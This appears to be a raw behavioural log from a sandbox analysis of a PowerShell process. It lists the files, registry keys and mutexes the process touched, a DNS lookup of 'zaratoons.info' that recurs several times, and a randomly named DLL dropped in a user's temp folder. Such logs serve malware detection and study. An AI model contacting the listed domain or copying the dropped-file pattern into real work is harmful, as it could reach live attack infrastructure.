windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
